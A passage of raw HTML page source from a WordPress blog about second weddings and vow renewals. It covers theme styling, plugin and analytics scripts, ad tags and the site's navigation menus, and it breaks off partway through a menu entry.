g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.idotaketwo.com/blog/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='mashsb-styles-css' href='http://www.idotaketwo.com/blog/wp-content/plugins/mashsharer/assets/css/mashsb.min.css?ver=3.6.4' type='text/css' media='all' /> <style id='mashsb-styles-inline-css' type='text/css'> .mashsb-count {color:#cccccc;}@media only screen and (min-width:568px){.mashsb-buttons a {min-width: 177px;}} </style> <link rel='stylesheet' id='cookie-consent-style-css' href='http://www.idotaketwo.com/blog/wp-content/plugins/uk-cookie-consent/assets/css/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wordpress-popular-posts-css-css' href='http://www.idotaketwo.com/blog/wp-content/plugins/wordpress-popular-posts/public/css/wpp.css?ver=4.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='mashfs-css' href='http://www.idotaketwo.com/blog/wp-content/plugins/mashshare-floating-sidebar/assets/css/mashfs.min.css?ver=1.3.8' type='text/css' media='all' /> <link rel='stylesheet' id='mashnet-styles-css' href='http://www.idotaketwo.com/blog/wp-content/plugins/mashshare-networks/assets/css/mashnet.min.css?ver=2.4.7' type='text/css' media='all' /> <link rel='stylesheet' id='social-icon-css' href='http://www.idotaketwo.com/blog/wp-content/themes/presso/font-icons/social-icons/css/zocial.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='entypo-icon-css' href='http://www.idotaketwo.com/blog/wp-content/themes/presso/font-icons/entypo/css/entypo.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='slick-css' href='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/slick/slick.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='slick-theme-css' href='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/slick/slick-theme.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='presso-css-theme-css' href='http://www.idotaketwo.com/blog/wp-content/themes/presso/style.css?ver=3.3.0' type='text/css' media='all' /> <style id='presso-css-theme-inline-css' type='text/css'> /* Color */ .vw-hamburger-icon, .vw-hamburger-icon::before, .vw-hamburger-icon::after { background-color: #191919; } .vw-menu-main .main-menu-link span:before { background-color: #193452; } /* Header Font Family */ .vw-title-area__post-meta, .vw-header-font-family, .vw-about-author__tagline, #wp-calendar thead, #wp-calendar tfoot, .vw-menu-main .sub-menu-link > span, .vw-menu-top, .vw-post-box__meta, .vw-pagination, .vw-page-links, .vw-categories, .vw-post-meta, .vw-category-list__count, nav.woocommerce-pagination { font-family: Raleway; } .button, input[type="button"], input[type="reset"], input[type="submit"], .vw-button, .woocommerce a.button, .woocommerce button.button, .woocommerce input.button, .woocommerce #respond input#submit, .woocommerce-page a.button, .woocommerce-page button.button, .woocommerce-page input.button, .woocommerce-page #respond input#submit, .widget_tag_cloud a, .vw-tagline, .vw-review__item-title, .vw-review__total, .vw-super-title, .vw-social-counter__count, .vw-tab-title, .wc-tabs { font-family: Raleway; font-weight: 600; font-style: ; letter-spacing: 0px; text-transform: capitalize; } /* Font size */ @media (min-width: 992px) { .vw-about-author__name, .vw-related-posts__title, .vw-our-picks-posts__title, .vw-post-comments-title, .vw-comments-title { font-size: 36px; } } /* Border */ body hr, body .widget + .widget, body .vw-main-post:not(:last-child), body .vw-about-author:not(:last-child), body .vw-related-posts:not(:last-child), body .vw-our-picks-posts:not(:last-child), body .vw-post-navigation:not(:last-child), body .vw-comments-area:not(:last-child), body .vw-post-footer-section-custom:not(:last-child) { border-color: #333; border-width: 6px; } body .vw-pagination, body .vwspc-section-post-box:not(:first-child) .vwspc-section-content > :first-child, body .vwspc-section-post-box-sidebar:not(:first-child) .vwspc-section-content > :first-child, body .vwspc-section-2-sidebars-section .widget:first-child, body .vwspc-section-3-sidebars-section .widget:first-child, body .vwspc-section-custom-section:not(:first-child) .vwspc-section-content > :first-child, body .vwspc-section:not(:first-child) body .vwspc-section-sidebar .widget:first-child { border-color: #333; border-width: 6px; } /* Mobile Logo */ @media (max-width: 767px) { div.vw-header__logo { padding-top: 25px; padding-bottom: 25px; padding-left: 0; padding-right: 0; } } /* Accent */ .vw-post-content a { color: #ff5c5c; } /* Accent - Auto generated */ .vw-footer-sidebar .widget-title, .vw-menu-mobile .menu-link:hover, .vw-404-box__hero-title, .vw-accordion .ui-state-hover span, .vw-404-text { color: #ff5c5c; } .vw-post-content th, .vw-comment__content th, .no-touch button:hover, .no-touch input[type="button"]:hover, .no-touch input[type="reset"]:hover, .no-touch input[type="submit"]:hover, .no-touch .woocommerce a.button:hover, .no-touch .woocommerce button.button:hover, .no-touch .woocommerce input.button:hover, .no-touch .woocommerce #respond input#submit:hover, .no-touch .woocommerce-page a.button:hover, .no-touch .woocommerce-page button.button:hover, .no-touch .woocommerce-page input.button:hover, .no-touch .woocommerce-page #respond input#submit:hover, .no-touch .vw-button:hover, .vw-button--accent, .no-touch .vw-button--outline.vw-button:hover, .vw-top-bar .vw-social-icon:hover, .vw-title-area__nav-button:hover, .vw-menu-top .menu-item:hover, .vw-menu-main .menu-item:hover, .vw-menu-top .main-menu-link:hover, .vw-menu-main .main-menu-link:hover, .vw-pagination__links .page-numbers.current, .vw-post-box--block-d .vw-post-views, .vw-post-box--slide-1:hover .vw-post-box__read-more, .vw-categories a, .vw-page-links > span:not(:first-child), .vw-scroll-to-top, .vw-content-slider .slick-prev, .vw-content-slider .slick-next, .vw-dropcap-circle, .vw-dropcap-box, .vw-review--points .vw-review__item-score-bar, .vw-review--percentage .vw-review__item-score-bar, .vw-review-summary, .sk-folding-cube .sk-cube:before, #wp-calendar tbody td:hover, .widget_product_tag_cloud .tagcloud a:hover, .widget_tag_cloud .tagcloud a:hover, .vw-category-list__count, .widget #sb_instagram .sbi_follow_btn a { background-color: #ff5c5c; } .vw-footer-sidebar .widget-title, .vw-menu-mobile .menu-link:hover, .vw-404-box__hero-title, .vw-accordion .ui-state-hover span, .vw-404-text { color: #ff5c5c; } .vw-post-content th, .vw-comment__content th, .no-touch button:hover, .no-touch input[type="button"]:hover, .no-touch input[type="reset"]:hover, .no-touch input[type="submit"]:hover, .no-touch .woocommerce a.button:hover, .no-touch .woocommerce button.button:hover, .no-touch .woocommerce input.button:hover, .no-touch .woocommerce #respond input#submit:hover, .no-touch .woocommerce-page a.button:hover, .no-touch .woocommerce-page button.button:hover, .no-touch .woocommerce-page input.button:hover, .no-touch .woocommerce-page #respond input#submit:hover, .no-touch .vw-button:hover, .vw-button--accent, .no-touch .vw-button--outline.vw-button:hover, .vw-top-bar .vw-social-icon:hover, .vw-title-area__nav-button:hover, .vw-menu-top .menu-item:hover, .vw-menu-main .menu-item:hover, .vw-menu-top .main-menu-link:hover, .vw-menu-main .main-menu-link:hover, .vw-pagination__links .page-numbers.current, .vw-post-box--block-d .vw-post-views, .vw-post-box--slide-1:hover .vw-post-box__read-more, .vw-categories a, .vw-page-links > span:not(:first-child), .vw-scroll-to-top, .vw-content-slider .slick-prev, .vw-content-slider .slick-next, .vw-dropcap-circle, .vw-dropcap-box, .vw-review--points .vw-review__item-score-bar, .vw-review--percentage .vw-review__item-score-bar, .vw-review-summary, .sk-folding-cube .sk-cube:before, #wp-calendar tbody td:hover, .widget_product_tag_cloud .tagcloud a:hover, .widget_tag_cloud .tagcloud a:hover, .vw-category-list__count, .widget #sb_instagram .sbi_follow_btn a { background-color: #ff5c5c; } </style> <link rel='stylesheet' id='redux-google-fonts-presso_options-css' href='http://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%2C100italic%2C200italic%2C300italic%2C400italic%2C500italic%2C600italic%2C700italic%2C800italic%2C900italic%7CLato%3A100%2C300%2C400%2C700%2C900%2C100italic%2C300italic%2C400italic%2C700italic%2C900italic%7COswald%3A400&#038;ver=1555427000' type='text/css' media='all' /> <link rel='stylesheet' id='wpgdprc.css-css' href='http://www.idotaketwo.com/blog/wp-content/plugins/wp-gdpr-compliance/assets/css/front.css?ver=1557406090' type='text/css' media='all' /> <style id='wpgdprc.css-inline-css' type='text/css'> div.wpgdprc .wpgdprc-switch .wpgdprc-switch-inner:before { content: 'Yes'; } div.wpgdprc .wpgdprc-switch .wpgdprc-switch-inner:after { content: 'No'; } </style> <link rel='stylesheet' id='jetpack_css-css' href='http://www.idotaketwo.com/blog/wp-content/plugins/jetpack/css/jetpack.css?ver=7.3.1' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' data-cfasync="false" src='//s.glam.com/s/ad.min.js?ver=5.2'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var mashsb = {"shares":"127","round_shares":"1","animate_shares":"0","dynamic_buttons":"0","share_url":"https:\/\/www.idotaketwo.com\/blog\/home\/","title":"Home","image":null,"desc":"Second Wedding Ideas for Your Remarriage.\r\nEverything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals.\r\nThere are a lot of things that are actually kind of fantastic the second time around, not \u2026","hashtag":"","subscribe":"content","subscribe_url":"https:\/\/www.facebook.com\/topweddingsites\/","activestatus":"1","singular":"1","twitter_popup":"1","refresh":"0","nonce":"38ed99182d","postid":"938","servertime":"1558021267","ajaxurl":"https:\/\/www.idotaketwo.com\/blog\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/plugins/mashsharer/assets/js/mashsb.min.js?ver=3.6.4'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/plugins/stop-user-enumeration/frontend/js/frontend.js?ver=1.3.20'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpp_params = {"sampling_active":"0","sampling_rate":"100","ajax_url":"https:\/\/www.idotaketwo.com\/blog\/wp-json\/wordpress-popular-posts\/v1\/popular-posts\/","ID":"938","token":"c38e3f889c","debug":""}; /* ]]> */ </script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/plugins/wordpress-popular-posts/public/js/wpp-4.2.0.min.js?ver=4.2.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var mashfs = {"mobile_width":"568"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/plugins/mashshare-floating-sidebar/assets/js/mashfs.min.js?ver=1.3.8'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/plugins/mashshare-google-analytics/assets/js/mashga.min.js?ver=1.0.9'></script> <script type='text/javascript'> /* <![CDATA[ */ var mashnet = {"body":"Check out this article: ","subject":"Check out this site","pinterest_select":"0","pinterest_image":"","pinterest_desc":"Second Wedding Ideas for Your Remarriage. Everything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals. There are a lot of things that are actually kind of fantastic the second time around, not"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/plugins/mashshare-networks/assets/js/mashnet.min.js?ver=2.4.7'></script> <link rel='https://api.w.org/' href='https://www.idotaketwo.com/blog/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.idotaketwo.com/blog/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.idotaketwo.com/blog/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://wp.me/P61NcR-f8' /> <link rel="alternate" type="application/json+oembed" href="https://www.idotaketwo.com/blog/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.idotaketwo.com%2Fblog%2Fhome%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.idotaketwo.com/blog/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.idotaketwo.com%2Fblog%2Fhome%2F&#038;format=xml" /> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','gaplusu'); function gaplus_track() { gaplusu('create', 'UA-1545527-6', 'auto'); gaplusu('send', 'pageview'); } gaplus_track(); </script> <style id="ctcc-css" type="text/css" media="screen"> #catapult-cookie-bar { box-sizing: border-box; max-height: 0; opacity: 0; z-index: 99999; overflow: hidden; color: #ddd; position: fixed; left: 0; bottom: 0; width: 100%; background-color: #464646; } #catapult-cookie-bar a { color: #fff; } #catapult-cookie-bar .x_close span { background-color: ; } button#catapultCookie { background:; color: ; border: 0; padding: 6px 9px; border-radius: 3px; } #catapult-cookie-bar h3 { color: #ddd; } .has-cookie-bar #catapult-cookie-bar { opacity: 1; max-height: 999px; min-height: 30px; }</style> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style> <!-- Facebook Integration --> <meta property="og:site_name" content="I Do Take Two"> <meta property="og:title" content="Home"> <meta property="og:description" content="Second Wedding Ideas for Your Remarriage. Everything You Need To Know About Second Weddings, Remarriage, Second Marriages and Vow Renewals. There are a lot of things that are actually kind of fantastic the second time around, not the least of which are second weddings and vow renewal ceremonies. So, now that you’ve found the proverbial ..."> <meta property="og:url" content="https://www.idotaketwo.com/blog/home/"/> <!-- End Facebook Integration --> <style type="text/css">.broken_link, a.broken_link { text-decoration: line-through; }</style> <style id="vw-custom-font" type="text/css"> </style> <style type="text/css" id="wp-custom-css"> </style> <style type="text/css" title="dynamic-css" class="options-output">.vw-content-area{background-color:#ffffff;}h1, h2, h3, h4, h5, h6, .vw-header-font,#wp-calendar caption,.vw-accordion-header-text,.vw-review-item-title,.vw-previous-link-page, .vw-next-link-page,.vw-quote,blockquote,.vw-comment__author,.widget_shopping_cart_content .mini_cart_item a:nth-child(2){font-family:Raleway;text-transform:capitalize;letter-spacing:0px;font-weight:600;font-style:normal;color:#0d5a7a;}h1{font-size:36px;}h2{font-size:30px;}h3{font-size:24px;}h4{font-size:18px;}h5{font-size:14px;}h6{font-size:12px;}body,cite,.vw-quote-cite{font-family:Lato;font-weight:300;font-style:normal;color:#000000;font-size:17px;}.vw-top-bar{font-family:Raleway;letter-spacing:0px;font-weight:600;font-style:normal;font-size:13px;}.widget-title{font-family:Raleway;letter-spacing:1px;font-weight:600;font-style:normal;color:#333;font-size:33px;}body .vwspc-section-title{font-family:Raleway;letter-spacing:1px;font-weight:600;font-style:normal;color:#333;font-size:33px;}.vw-super-title{font-size:13px;}.vw-post-box .vw-post-box__meta{font-size:11px;}.vw-categories{font-size:13px;}.vw-header__logo{padding-top:42px;padding-right:30px;padding-bottom:42px;padding-left:15px;}.vw-site-header__floating{padding-top:11px;padding-bottom:11px;}.vw-header{background:#ffffff;}.vw-header,.vw-header .vw-instant-search i{color:#191919;}.vw-top-bar{background:#333333;}.vw-top-bar{color:#eeeeee;}.vw-menu-main .main-menu-link{font-family:Oswald;text-transform:uppercase;letter-spacing:0px;font-weight:400;font-style:normal;font-size:16px;}.vw-menu-main{background:#ffffff;}.vw-menu-main .main-menu-link{color:#193452;}.vw-menu-main .sub-menu-link{color:#193452;}.vw-menu-main .sub-menu-wrapper{background:#f7f7f7;}.vw-footer{background-color:#191919;}.vw-footer h1,.vw-footer h2,.vw-footer h3,.vw-footer h4,.vw-footer h5,.vw-footer h6{color:#ffffff;}.vw-footer .widget-title{color:#3facd6;}.vw-footer{color:#9a9a9a;}.vw-bottom-bar{background:#111111;}.vw-bottom-bar{color:#f7f7f7;}</style><style type='text/css'> .ai-viewport-3 { display: none !important;} .ai-viewport-2 { display: none !important;} .ai-viewport-1 { display: inherit !important;} .ai-viewport-0 { display: none !important;} @media (min-width: 768px) and (max-width: 979px) { .ai-viewport-1 { display: none !important;} .ai-viewport-2 { display: inherit !important;} } @media (max-width: 767px) { .ai-viewport-1 { display: none !important;} .ai-viewport-3 { display: inherit !important;} } </style> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '1598284740210521', { em: 'insert_email_variable' }); fbq('track', 'PageView'); </script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1598284740210521&ev=PageView&noscript=1" /></noscript> <!-- DO NOT MODIFY --> <!-- End Facebook Pixel Code --> <style>#number-786 a, :hover{text-decoration: none}</style><style>#how-should-f68o{margin:0px 0px 24px; overflow:hidden}#how-should-f68o::after{display:block; content:' '; clear:both}#how-should-f68o>*{margin:0; float:left; width:100%}#how-should-f68o>#how-should-f68{width:100%; background-color:rgb(255, 255, 255); margin-left:-100%}</style> </head> <body id="site-top" class="page-template page-template-page_simple_composer page-template-page_simple_composer-php page page-id-938 ctcc-exclude-AF ctcc-exclude-AN ctcc-exclude-AS ctcc-exclude-NA ctcc-exclude-OC ctcc-exclude-SA vw-site--full-width vw-enable-sticky-menu vw-enable-sticky-sidebar"> <div class="vw-site"> <div class="vw-header-area"> <!-- Top Bar: Default --> <div class="vw-top-bar vw-top-bar--default"> <div class="container"> <div class="vw-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <!-- Top Menu --> <nav class="vw-menu-top"> <ul id="menu-new-top-menu" class="vw-menu vw-menu-type-text clearfix"><li id="menu-item-941" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-938 current_page_item menu-item-941 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/home/" aria-current="page" class=" menu-link main-menu-link"><span>Home</span></a></li> <li id="menu-item-3777" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3777 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/about-us-2/" class=" menu-link main-menu-link"><span>About Us</span></a></li> <li id="menu-item-3779" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3779 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/about-us-2/" class=" menu-link main-menu-link"><span>Advertise</span></a></li> <li id="menu-item-1514" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1514 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/submit-wedding-or-vows/" class=" menu-link main-menu-link"><span>Submit Wedding or Vows</span></a></li> </ul></nav> <!-- End Top Menu --> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <span class="vw-site-social-links vw-social-icons"> <a class="vw-social-icon vw-icon-social-facebook vw-social-icon--medium" rel="author" href="https://www.facebook.com/pages/Idotaketwocom/157279667807124" title="Facebook" target="_blank"> <i class="vw-icon icon-social-facebook"></i> <span class="vw-social-icon__label">Facebook</span> </a> <a class="vw-social-icon vw-icon-social-gplus vw-social-icon--medium" rel="author" href="https://plus.google.com/u/5/b/105220780787588888304/105220780787588888304/" title="Google+" target="_blank"> <i class="vw-icon icon-social-gplus"></i> <span class="vw-social-icon__label">Google+</span> </a> <a class="vw-social-icon vw-icon-social-pinterest vw-social-icon--medium" rel="author" href="http://pinterest.com/weddingqueen/" title="Pinterest" target="_blank"> <i class="vw-icon icon-social-pinterest"></i> <span class="vw-social-icon__label">Pinterest</span> </a> <a class="vw-social-icon vw-icon-social-rss vw-social-icon--medium" rel="author" href="http://www.idotaketwo.com/blog/feed/" title="RSS" target="_blank"> <i class="vw-icon icon-social-rss"></i> <span class="vw-social-icon__label">RSS</span> </a> <a class="vw-social-icon vw-icon-social-twitter vw-social-icon--medium" rel="author" href="https://twitter.com/IDoTakeTwo" title="Twitter" target="_blank"> <i class="vw-icon icon-social-twitter"></i> <span class="vw-social-icon__label">Twitter</span> </a> </span> <div class="vw-instant-search"> <a class="vw-instant-search__button" href="https://www.idotaketwo.com/blog/search/"><i class="vw-icon icon-entypo-search"></i></a> </div> </div> </div> </div> </div> <!-- End Top Bar --> <!-- Site Header : Left Aligned Logo --> <header class="vw-header vw-header--left" itemscope itemtype="https://schema.org/WPHeader" > <div class="vw-header__inner"> <div class="vw-header__main-container vw-bar container"> <div class="vw-header__logo vw-bar__placeholder vw-bar__placeholder--left"> <!-- Logo --> <div class="vw-logo" itemscope itemtype="https://schema.org/Organization" > <a class="vw-logo__link" href="https://www.idotaketwo.com/blog/" itemprop="url" > <img class="vw-logo__mobile_image" src="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png" srcset="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_Clean.png 2x" width="275" height="53" alt="I Do Take Two" itemprop="mobile_logo" > <img class="vw-logo__image" src="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png" srcset="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_Clean.png 2x" width="275" height="53" alt="I Do Take Two" itemprop="logo" > </a> </div> <!-- End Logo --> <div class="vw-mobile-nav-button"> <button class="hamburger hamburger--spin" type="button"> <span class="hamburger-box"> <span class="hamburger-inner"></span> </span> </button> </div> </div> <div class="vw-header__ads vw-bar__placeholder vw-bar__placeholder--right"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-2266364363711860" data-ad-slot="2000683958" data-ad-format="auto"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </div> <div class="vw-header__main-menu vw-sticky-menu"> <!-- Main Menu --> <nav class="vw-menu-main" itemscope itemtype="https://schema.org/SiteNavigationElement" > <ul id="menu-main-menu" class="vw-menu vw-menu-type-mega"><li id="menu-item-5644" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-has-children menu-item-5644 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="http://www.idotaketwo.com/blog/home/" aria-current="page" class=" menu-link main-menu-link"><span>Wedding Guides</span></a><div class="sub-menu-wrapper"> <ul class="sub-menu"> <li id="menu-item-5645" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5645 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/vow-renewal-etiquette-2/" class=" menu-link sub-menu-link"><span>Vow Renewal Etiquette</span></a></li> <li id="menu-item-5646" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5646 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/second-marriage-ceremomy-2/" class=" menu-link sub-menu-link"><span>Second Marriage Ceremony</span></a></li> <li id="menu-item-5653" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5653 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/second-wedding-dress-2/" class=" menu-link sub-menu-link"><span>Second Wedding Dress</span></a></li> <li id="menu-item-5654" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5654 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/dresses-for-vow-renewal/" class=" menu-link sub-menu-link"><span>Vow Renewal Dress</span></a></li> <li id="menu-item-5655" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5655 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/wedding-etiquette-advice-2/" class=" menu-link sub-menu-link"><span>Second Wedding Etiquette</span></a></li> <li id="menu-item-5656" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5656 menu-item-depth-1 sub-menu-item"><a href="http://idotaketwo.com/blog/children-involvement-in-wedding-ceremonies/" class=" menu-link sub-menu-link"><span>Children &#038; Weddings</span></a></li> <li id="menu-item-5657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5657 menu-item-depth-1 sub-menu-item"><a href="http://idotaketwo.com/blog/wedding-invitations-2/" class=" menu-link sub-menu-link"><span>Second Wedding Invitation Etiquette</span></a></li> <li id="menu-item-5658" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5658 menu-item-depth-1 sub-menu-item"><a href="http://idotaketwo.com/blog/wedding-toasts-wedding-speeches-2/" class=" menu-link sub-menu-link"><span>Toasts &#038; Wedding Speeches</span></a></li> <li id="menu-item-5659" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5659 menu-item-depth-1 sub-menu-item"><a href="http://idotaketwo.com/blog/wording-second-wedding-invitations-examples-samples-2/" class=" menu-link sub-menu-link"><span>Second Wedding Speeches Example</span></a></li> </ul> </div> </li> <li id="menu-item-5492" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5492 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--latest"><a href="https://www.idotaketwo.com/blog/category/wedding-attire/" class=" menu-link main-menu-link"><span>Dresses</span></a><div class="sub-menu-wrapper"> <ul class="sub-menu"> <li id="menu-item-5680" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5680 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/second-wedding-dress-2/" class=" menu-link sub-menu-link"><span>Second Wedding Dress</span></a></li> <li id="menu-item-5681" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5681 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/wedding-attire-dresses-for-vow-renewals/" class=" menu-link sub-menu-link"><span>Vow Renewal Dress</span></a></li> <li id="menu-item-5682" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5682 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/second-wedding-dresses-for-an-older-still-sexy-bride/" class=" menu-link sub-menu-link"><span>Dresses for An Older (&#038; Still Sexy) Bride</span></a></li> <li id="menu-item-5683" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5683 menu-item-depth-1 sub-menu-item"><a href="https://www.idotaketwo.com/blog/category/wedding-attire/" class=" menu-link sub-menu-link"><span>Top Wedding Dress Posts</span></a></li> </ul> <div class="vw-mega-menu-area vw-mega-menu-area--post"> <div class="vw-loop vw-loop--block-h vw-loop--block-h-3 vw-loop--border-bottom"> <div class="vw-flex-grid vw-flex-grid--sm-3 vw-flex-grid--medium-gap vw-flex-grid---no-grow"> <div class="vw-flex-grid__item" data-slugs="inspiration wedding-attire wedding-dress"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9924 post type-post status-publish format-standard has-post-thumbnail hentry category-inspiration category-wedding-attire category-wedding-dress tag-wedding-dresses" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="fall 2019 look 13 carolina herrera bridal" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" 